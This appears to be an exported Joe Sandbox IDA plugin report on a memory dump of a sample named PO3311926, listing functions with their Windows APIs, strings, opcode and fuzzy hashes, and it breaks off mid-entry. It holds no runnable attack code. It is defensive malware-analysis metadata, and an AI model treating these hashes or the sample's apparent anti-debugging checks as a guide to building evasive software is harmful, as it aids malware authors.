Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 0612c478a024562e36647fb5d850066f157686397077ea71e91b8e545256b419
Instruction ID: 10783829229bcb43d8d76bfdd58717a035a1804e95ce12bae2ae717a316b5587
Opcode Fuzzy Hash: 0612c478a024562e36647fb5d850066f157686397077ea71e91b8e545256b419
Instruction Fuzzy Hash: 32C21871E086298FDB25CE289D80BEAB7F5EB84305F1541EED45EE7240E775AE818F40

Uniqueness

Uniqueness Score: -1.00%

Function 00BA32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BA3300
_swprintf.LIBCMT ref: 00BA36C7

Strings

hc%u, xrefs: 00BA370A
h%u, xrefs: 00BA36BC
CMT, xrefs: 00BA3A17

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: 303f8fec31f4fec33c523b5d11b0a7a04e5d1ac56ae3441f63456b1b3db5464a
Instruction ID: 3f065d3fd02dbe9818ba8738784531f0600c0cc31858f540ed78653ca80bf10a
Opcode Fuzzy Hash: 303f8fec31f4fec33c523b5d11b0a7a04e5d1ac56ae3441f63456b1b3db5464a
Instruction Fuzzy Hash: 0B32C571518384AFDB14DF74C895AEA3BE5EF16700F4404BDFD8A8B282DB749A49CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BA286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BA2874
_strlen.LIBCMT ref: 00BA2E3F

Part of subcall function 00BB02BA: __EH_prolog.LIBCMT ref: 00BB02BF

Part of subcall function 00BB1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00BABAE9,00000000,?,?,?,0001042E), ref: 00BB1BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BA2F91

Strings

CMT, xrefs: 00BA2FBC

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: 29f9ba5a6dae661a3ccfaae6114dca33a4ba1cbab49a52acd7b4a3aacfb7347b
Instruction ID: 0f6224b07620759e7c9a8c5bb17493506375610cf4f2501b665e165b055a8db1
Opcode Fuzzy Hash: 29f9ba5a6dae661a3ccfaae6114dca33a4ba1cbab49a52acd7b4a3aacfb7347b
Instruction Fuzzy Hash: 0C62F6715083458FDB19DF38C8967EA3BE1EF56300F0845BEEC9A8B282D7759945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BBF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00BBF844
IsDebuggerPresent.KERNEL32 ref: 00BBF910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BBF930
UnhandledExceptionFilter.KERNEL32(?), ref: 00BBF93A

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 15e66de92e14a6402e5f01140ea6bff7309b31d39fd3a1ceb2dbd302c44f9603
Instruction ID: c34ff8c116f9298ab999a6c4f7e00c8c29a2005f5a6d439db4633fb23895b61e
Opcode Fuzzy Hash: 15e66de92e14a6402e5f01140ea6bff7309b31d39fd3a1ceb2dbd302c44f9603
Instruction Fuzzy Hash: 78310975D0621A9BDB10DFA4DD897DCBBF8AF04704F1040EAE40CA7250EBB19A848F45

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,00BBE5E8,0000001C,00BBE7DD,00000000,?,?,?,?,?,?,?,00BBE5E8,00000004,00C01CEC,00BBE86D), ref: 00BBE6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00BBE5E8,00000004,00C01CEC,00BBE86D), ref: 00BBE6CF

Strings

D, xrefs: 00BBE6C3

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 32c60f6d9944902aaa32aedcaefb8ce2ce8dcd38ecd253c1937bf5ad1a3e8047
Instruction ID: 4c9d2eb15e021f8f47c32d020e7876b21cdd5f8fb52b70c6ecaae6474daae4c3
Opcode Fuzzy Hash: 32c60f6d9944902aaa32aedcaefb8ce2ce8dcd38ecd253c1937bf5ad1a3e8047
Instruction Fuzzy Hash: 9C01F7326001096BDB14DE29DC09BED7BEAEFC4324F0CC161ED29D7251EA78ED058680

Uniqueness

Uniqueness Score: -1.00%

Function 00BC8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00BC8FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00BC8FBF
UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00BC8FCC

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: d62cf3a2dfc31358e06db25de12eba0412aa99c00e3a29064ee8bf3f66cda326
Instruction ID: a60a8bd898a618883a2d63cd3d17d8cbc607e56d6ea968bd980ad7f228f22e08
Opcode Fuzzy Hash: d62cf3a2dfc31358e06db25de12eba0412aa99c00e3a29064ee8bf3f66cda326
Instruction Fuzzy Hash: 1631A275901229ABCB21DF68DC89B99BBF8EF08710F5041EAE41CA7251EB709F858F45

Uniqueness

Uniqueness Score: -1.00%

Function 00BCB348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 00BCB4DB

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: ebed6f6b1864a2bdde05b185244823912acfc957b70c50dd67a14627fe2e9340
Instruction ID: 6badab9c90291defed2f65de80366a45cb7922c6944771e59efda8e280f71e55
Opcode Fuzzy Hash: ebed6f6b1864a2bdde05b185244823912acfc957b70c50dd67a14627fe2e9340
Instruction Fuzzy Hash: 8F31D072900249ABCB289E78CC86EFEBBFDDB85314F1441ECE91997252E7309E458B50

Uniqueness

Uniqueness Score: -1.00%

Function 00BCD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: 931d7577ae094b8bc69bf4a28a916954b72a4af03cde571d170252592a26e157
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: 8902FA75E002199BDF14DFA9C980BADB7F1EF88314F2582AED919E7384D731AD418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00BBAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00BBAF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,00BDE72C,?,?), ref: 00BBAF84

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: c382748f7e8c55979ac4019f0573a9a4095e623ea892a9187c1025790f289e37
Instruction ID: d6b7f322473fbb1e2a158a5eb27c6c6b0c2a58464f7f2fd00845e1df08e10758
Opcode Fuzzy Hash: c382748f7e8c55979ac4019f0573a9a4095e623ea892a9187c1025790f289e37
Instruction Fuzzy Hash: 4C015A7A200319AAD7109F64EC45FAAB7F8EF08750F004062FB15AB2A1E770A954CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BA6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00BA6DDF,00000000,00000400), ref: 00BA6C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00BA6C95

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 9186b710c6439e50c860a44aa570031e6a3f1cb41408f49e41aac216714ad750
Instruction ID: 025b85954da9b549fc54c9a4250768ca9b059c4b9af928350b3c057c3ca8d399
Opcode Fuzzy Hash: 9186b710c6439e50c860a44aa570031e6a3f1cb41408f49e41aac216714ad750
Instruction Fuzzy Hash: 39D0A970348300BFFA000B218C16F2ABBDAFF52F61F18C014B380E90E1EA708420A62A

Uniqueness

Uniqueness Score: -1.00%

Function 00BD19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BD19EF,?,?,00000008,?,?,00BD168F,00000000), ref: 00BD1C21

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: fa1e8cd3dd50d1a8efe2d54ac9ba433a869bd503d2351c5124eb7119266c60fd
Instruction ID: 8d48a5bd6ae96de4a9573cda43ce9644421f23df7e0229d8243a7fb373007807
Opcode Fuzzy Hash: fa1e8cd3dd50d1a8efe2d54ac9ba433a869bd503d2351c5124eb7119266c60fd
Instruction Fuzzy Hash: 69B14F35210609AFD719CF2CC486B65BBE0FF45364F298A9AE899CF3A1D335D991CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00BBF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00BBF66A

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 3a83308e1e6f6134149ab0a7a43a8bdf7f4cabcf67d85bd12c1d4d3a5a5f2c32
Instruction ID: 5e6ed0156ccf9dae5e4d2f26cf5b05d404db4c24a53d6fbcfaf61e24bf8a687c
Opcode Fuzzy Hash: 3a83308e1e6f6134149ab0a7a43a8bdf7f4cabcf67d85bd12c1d4d3a5a5f2c32
Instruction Fuzzy Hash: 055149B190160A8FEB25CF95EC917BEBBF4FB48314F2485AAD815EB250D7B49D00CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BAB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00BAB16B

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 3cc0c5a9178574ccfea778a5035a147837c6de9de7e2d97daf52fc246b60b92c
Instruction ID: d8d881d2eb34369c383554d23f1cda7cd714241fe0363412674ce67d783f61fd
Opcode Fuzzy Hash: 3cc0c5a9178574ccfea778a5035a147837c6de9de7e2d97daf52fc246b60b92c
Instruction Fuzzy Hash: B0F030B4D012488FDB18DB18ECA2AD973F1FB49715F204699D52597391DB70A9C0CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00BA40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

gj, xrefs: 00BA41BC

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: b6c57d5127126c1936a174b36350094156ff89846745552e7235a62f677fc4e4
Instruction ID: ceabd0214bf8e766c84a96947fab7d84293aee002070d5feece1751b241ec43b
Opcode Fuzzy Hash: b6c57d5127126c1936a174b36350094156ff89846745552e7235a62f677fc4e4
Instruction Fuzzy Hash: 33C14876A083418FC354CF29D88065AFBE1BFC8708F19892EE998D7352D734E945CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00BBF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00BBF3A5), ref: 00BBF9DA

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 95fae2f0a464fc2ecc2b4aea47e82bdd631a78c6a35cda84eba5536fec2521f4
Instruction ID: 52613d67053fc64f237817d4393455fdd51ebe36f874a47e26f7f4896173214f
Opcode Fuzzy Hash: 95fae2f0a464fc2ecc2b4aea47e82bdd631a78c6a35cda84eba5536fec2521f4
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00BCC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00BCC030

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: aa93b102473de11e5359f460d0d332439abe1239a49a0640d790d0e0dc37ee2b
Instruction ID: 7473e0881c36d9299c135fff811586fe1498cc1dd3c87b9b900bb36f4b22ecd8
Opcode Fuzzy Hash: aa93b102473de11e5359f460d0d332439abe1239a49a0640d790d0e0dc37ee2b
Instruction Fuzzy Hash: FEA011302022028BCB008F30AE2C30C3BE8AA00A8030A002AA008C2020EE2080A0AA02

Uniqueness

Uniqueness Score: -1.00%

Function 00BB62CA Relevance: .8, Instructions: 829COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
Instruction ID: b10275a2839e939fd89b1e5a8c1d9b5abe0a6a49db1d3c724f76a56f95274d84
Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
Instruction Fuzzy Hash: AD62A3716047849FCB25CF28C8906F9BBE1AF95304F0889AED8DA8B346D778ED45CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00BB77EF Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
Instruction ID: e694845bf00a460104444b0c14ce45da0dff8c211a9b00e0693b17f18588ca2a
Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
